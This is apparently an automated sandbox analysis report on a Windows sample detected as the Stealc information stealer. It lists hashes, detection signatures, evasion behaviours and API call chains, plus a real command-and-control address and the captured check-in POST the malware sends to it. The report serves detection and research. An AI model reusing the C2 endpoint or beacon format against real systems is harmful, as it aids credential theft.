Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560037
MD5:e1dcc0eabbbedc586e3f5fd45f8735d0
SHA1:b434195b6c7d5a4d5960840d18df55cc1fc3ff79
SHA256:e20885cb4967e6f72d4c70dcb97c1fd19aefff88972723b266483a09966916ca
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2812 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E1DCC0EABBBEDC586E3F5FD45F8735D0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2137394593.0000000004FD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2812JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2812JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T10:37:16.839004+010020442431Malware Command and Control Activity Detected192.168.2.549706185.215.113.20680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.206/baAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/kaAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/yaAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/SaAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.phpAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/tingsLMEM8Avira URL Cloud: Label: malware
              Source: 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00624C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00624C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006260D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_006260D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006440B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006440B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00636960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00636960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0062EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00636B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00636B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00629B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00629B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00627750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006318A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006318A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00633910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00633910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00631269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00631269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00631250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00631250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0063E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00634B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00634B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0063CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006323A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006323A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0062DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00632390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00632390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0062DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0063DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0063D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006216A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006216B9

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49706 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 43 41 31 43 44 42 33 39 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="hwid"20CA1CDB3918194301792------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="build"mars------BAFIEGIECGCBKFIEBGCA--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00626C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_00626C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 43 41 31 43 44 42 33 39 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="hwid"20CA1CDB3918194301792------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="build"mars------BAFIEGIECGCBKFIEBGCA--
              Source: file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Sa
              Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ba
              Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/ya
              Source: file.exe, 00000000.00000002.2196277198.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6-535557bcc5fa00
              Source: file.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS
              Source: file.exe, 00000000.00000002.2196277198.00000000012EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpg
              Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ka
              Source: file.exe, 00000000.00000002.2196277198.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/tingsLMEM8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00629770

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006448B00_2_006448B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DC1920_2_009DC192
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E51B90_2_008E51B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E59B10_2_008E59B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D89DA0_2_009D89DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099C9380_2_0099C938
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B5A150_2_008B5A15
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D03D80_2_009D03D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092E3C90_2_0092E3C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D54170_2_009D5417
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DA58C0_2_009DA58C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094E5870_2_0094E587
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CCD880_2_009CCD88
